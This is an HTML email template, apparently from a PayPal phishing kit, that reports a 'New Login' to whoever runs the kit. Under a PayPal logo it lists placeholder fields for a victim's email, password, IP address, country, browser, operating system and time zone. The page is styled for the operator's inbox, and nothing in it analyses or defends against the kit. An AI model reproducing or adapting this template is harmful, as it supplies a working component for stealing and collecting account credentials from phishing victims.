<!DOCTYPE html>
<html>
<head>
    <title></title>
    <style type="text/css">
        div{
            width:800px;
            background-color: rgb(36,46,60);
            border:3px solid rgb(127,187,25);
            margin:0 auto 8px ;
            padding:0;
            border-radius:10px;
            font-family: Candara ,HelveticaNeue,"Helvetica Neue",Helvetica,Arial;
        }
        img{
            padding-left: 8px;
        }
        td{
        	color: LightGray;
        }
    </style>
</head>
<body>
<div>
        <span style='display:block;border-bottom:2px solid rgb(127,187,25); padding: 8px 20px;color: LightGray;'>
            <table width='100%'>
                <tr>
                    <td><h5 style='margin:0;color: LightGray;'>New Login [<span style='color: rgb(127,187,25);'>IPA</span>] From [<span style='color: rgb(127,187,25);'>CNT</span>]</h5></td>
                    <td align='right'><span style='font-size:12px;font-family: Verdana;'>DTE</span></td>
                </tr>
            </table>
        </span>
        <span style='display:block;padding: 7px 25px;'>
	        <img src='https://2.bp.blogspot.com/-9kqL4BCH9Is/WKO66eEjm7I/AAAAAAAABDk/vb2PRZhkGC8se1HaM5FBKdOsLg6oEbXKgCLcB/s1600/logo_paypal_106x29.png'>
	        <table style='font-size:14px;color:#444;padding:5px 10px;margin-bottom:5px;'>
	        <tr>
	            <td style='color: LightGray;'><span>Email</span></td>
	            <td>:</td>
	            <td style="color: rgb(127,187,25);">EML</span></td>
	        </tr>
	        <tr>
	            <td><span>Password</span></td>
	            <td>:</td>
	            <td style="color: rgb(127,187,25);">PWD</td>
	        </tr>
	        <tr>
	            <td><span>IP</span></td>
	            <td>:</td>
	            <td style="color: rgb(127,187,25);">IPA</td>
	        </tr>
	        <tr>
	            <td><span>Country</span></td>
	            <td>:</td>
	            <td style="color: rgb(127,187,25);">CNT</td>
	         </tr>
	         <tr>
	            <td><span>Browser</span></td>
	            <td>:</td>
	            <td style="color: rgb(127,187,25);">BRS</td>
	         </tr>
	         <tr>
	            <td><span>Os</span></td>
	            <td>:</td>
	            <td style="color: rgb(127,187,25);">OPS</td>
	         </tr>
	         <tr>
	            <td><span>Time Zone</span></td>
	            <td>:</td>
	            <td style="color: rgb(127,187,25);">TMZ</td>
	         </tr>
	        </table>
        </span>
</div>
</body>
</html>